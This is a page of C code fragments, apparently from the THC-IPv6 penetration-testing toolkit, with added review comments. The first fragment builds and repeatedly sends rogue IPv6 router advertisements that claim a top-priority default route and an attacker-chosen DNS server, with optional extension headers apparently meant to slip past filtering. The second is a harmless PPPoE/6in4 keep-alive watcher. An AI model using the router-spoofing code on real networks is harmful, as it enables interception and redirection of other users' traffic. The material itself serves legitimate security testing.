  if (routerip6 == NULL || size < 1 || size > 128) {
    fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]);
    exit(-1);
  }
  if (size < 48 || size > 64)
    fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
  if (dns == NULL) {
    fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]);
    exit(-1);
  }
  if (ip6 == NULL) {
    fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]);
    exit(-1);
  }
  if (mtu < 1 || mtu > 65536) {
    fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]);
    exit(-1);
  }
  if (mtu < 1228 || mtu > 1500)
    fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
  if (mac6 == NULL) {
    fprintf(stderr, "Error: mac address in invalid\n");
    exit(-1);
  }
  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  // Clear the host part of route6: i = number of host bits, j = bytes touched
  // (rounded up), k = host bits in the partially used byte.
  i = 128 - size;
  j = i / 8;
  k = i % 8;
  if (k > 0)
    j++;
  memset(route6 + 16 - j, 0, j);
  // NOTE(review): the memset above already zeroed the partial byte at
  // 16 - j, and the mask below is applied to index 17 - j instead. For j == 1
  // that is index 16, one past a 16-byte address (presumably what
  // thc_resolve6() returns - verify). Only prefix lengths that are not a
  // multiple of 8 reach this statement.
  if (k > 0)
    route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k);

//  buf[3] = 250; // 0-3: reachable timer
  buf[6] = 4;                   // 4-7: retrans timer
  // option mtu: type 5, length 1 (8 bytes), mtu as big-endian 32-bit value
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  // option prefix: type 3, length 4 (32 bytes)
  buf[16] = 3;
  buf[17] = 4;
  buf[18] = size;               // prefix length
  buf[19] = 128 + 64;           // top two flag bits set
  memset(&buf[20], 17, 4);      // four bytes of 0x11
  memset(&buf[24], 4, 4);       // four bytes of 0x04
  memcpy(&buf[32], route6, 16); // the prefix itself

  i = 48;
  // mac address option: type 1, length 1 (8 bytes)
  buf[i++] = 1;
  buf[i++] = 1;
  memcpy(buf + i, mac6, 6);
  i += 6;

  // default route routing option (::/0)
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x00;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // two bytes left at zero
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  i += 16;                      // address, all zeros for default

  // specific route routing option 2000::/3
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x03;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // two bytes left at zero
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x20;              // address: 2000::
  i += 15;

  // specific route routing option fc00::/7
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x07;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // two bytes left at zero
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0xfc;              // address: fc00::
  i += 15;

  // dns option
  buf[i++] = 0x19;              // dns option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  i += 2;                       // reserved
  memset(buf + i, 1, 4);        // validity time
  i += 4;
  memcpy(buf + i, dns, 16);     // dns server
  i += 16;

  // total length of the option block built in buf
  frbuflen = i;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;

  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
      return -1;
  }
  if (do_frag) {
    type = NXT_FRAG;
    // NOTE(review): this loop reuses i, which still holds the option length
    // computed above and is passed as the length to thc_add_icmp6() below;
    // with -F the length argument becomes do_frag + 1. frbuflen keeps the
    // intended value - confirm which one should be used.
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
        return -1;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
    return -1;
  // NOTE(review): dstmac comes from thc_get_multicast_mac() and is never
  // checked for NULL before this call.
  if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
    return -1;
  frhdr = (thc_ipv6_hdr *) pkt;

  // the capture handle p was already opened above

  printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]);
  // Send, drain captured router solicitations through send_rs_reply(), wait
  // five seconds, repeat. Nothing in this loop ends it.
  while (1) {
    if (do_dst) {
      // skips the first 40 + myoff bytes of the generated packet and sends
      // the remainder in fragments (last argument 1240)
      thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
    } else {
      thc_send_pkt(interface, pkt, &pkt_len);
    }
    while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sleep(5);
  }
  return 0;                     // not reached
}
Esempio n. 13
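/*
 * Entry point of the keep-alive watcher for PPPoE / 6in4 encapsulated links.
 *
 * The encapsulation is chosen through the THC_IPV6_PPPOE or THC_IPV6_6IN4
 * environment variable. In active PPPoE mode (-a) a fixed 12-byte payload is
 * appended to the encapsulation header and sent every 15 seconds while
 * captured packets are handed to intercept(); in every other case
 * thc_pcap_function() runs the capture with intercept() as callback.
 *
 * Returns -1 when sending fails; bad options, a missing or invalid interface
 * or an oversized encapsulation header end the process with exit(-1).
 *
 * active, passive, debug, type, interface, do_hdr, do_hdr_size and do_hdr_off
 * are declared outside this function.
 */
int main(int argc, char *argv[]) {
  // data[] is the payload sent after the encapsulation header. It starts with
  // 0x09 and is sent under protocol bytes 0xc0 0x21 (set below), which
  // matches a PPP LCP Echo-Request - TODO confirm against the peer in use.
  char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c };
  time_t passed = 0;            // next point in time at which to send
  pcap_t *p;
  thc_ipv6_hdr hdr;
  int sndbuflen = 0, i;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "adp")) >= 0) {
    switch (i) {
    case 'a':
      active = 1;
      break;
    case 'd':
      debug = 1;
      break;
    case 'p':
      passive = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option -%c\n", i);
      exit(-1);
    }
  }

  if (getenv("THC_IPV6_PPPOE") != NULL)
    type = 1;
  else if (getenv("THC_IPV6_6IN4") != NULL)
    type = 2;

  if (type == 0) {
    fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n");
    exit(-1);
  }

  // Reported only; execution continues and ends up in the capture-only branch below.
  if (type == 2 && active)
    fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n");

  // The interface argument is mandatory. Without this check argv[optind] is
  // the NULL terminator, which would later be printed through %s.
  if (optind >= argc) {
    fprintf(stderr, "Error: no interface specified\n");
    exit(-1);
  }
  interface = argv[optind];

  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? "PPPoE" : "6in4", argv[optind]);
  if (active == 1 && type == 1) {
    if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) {
      fprintf(stderr, "Error: Could not set interface into promiscious mode\n");
      exit(-1);
    }

    // do_hdr_size and do_hdr_off are set outside this function; make sure the
    // header, the four patched bytes and the payload all fit into sndbuf
    // before anything is copied.
    if (do_hdr_size < 0 || do_hdr_off < 0 ||
        (size_t) do_hdr_size + sizeof(data) > sizeof(sndbuf) ||
        (size_t) do_hdr_off + 21 >= sizeof(sndbuf)) {
      fprintf(stderr, "Error: encapsulation header does not fit the send buffer\n");
      exit(-1);
    }

    // NOTE(review): do_hdr is assumed to hold at least do_hdr_size valid
    // bytes at this point - verify where it is filled in.
    memcpy(sndbuf, do_hdr, do_hdr_size);
    sndbuf[18 + do_hdr_off] = 0x00;
    sndbuf[19 + do_hdr_off] = sizeof(data) + 2;   // payload plus the two protocol bytes
    sndbuf[20 + do_hdr_off] = 0xc0;
    sndbuf[21 + do_hdr_off] = 0x21;
    memcpy(sndbuf + do_hdr_size, data, sizeof(data));
    sndbuflen = do_hdr_size + sizeof(data);

    // Only pkt and pkt_len are meaningful here; zero the rest so no
    // indeterminate field is handed to thc_send_pkt().
    memset(&hdr, 0, sizeof(hdr));
    hdr.pkt = sndbuf;
    hdr.pkt_len = sndbuflen;

    while (1) {
      thc_pcap_check(p, (char *) intercept, NULL);
      usleep(100);
      // send immediately on the first pass, then every 15 seconds
      if (passed <= time(NULL)) {
        if (thc_send_pkt(interface, (unsigned char *) &hdr, &sndbuflen) < 0) {
          fprintf(stderr, "Error: could not send packet to interface %s\n", interface);
          return -1;
        }
        passed = time(NULL) + 15;
      }
    }
  } else {
    // Capture-only mode. Control reaches the error below only when
    // thc_pcap_function() returns.
    thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL);
    fprintf(stderr, "Error: Could not set interface into promiscious mode\n");
    exit(-1);
  }

  return -1; // never reached unless error
}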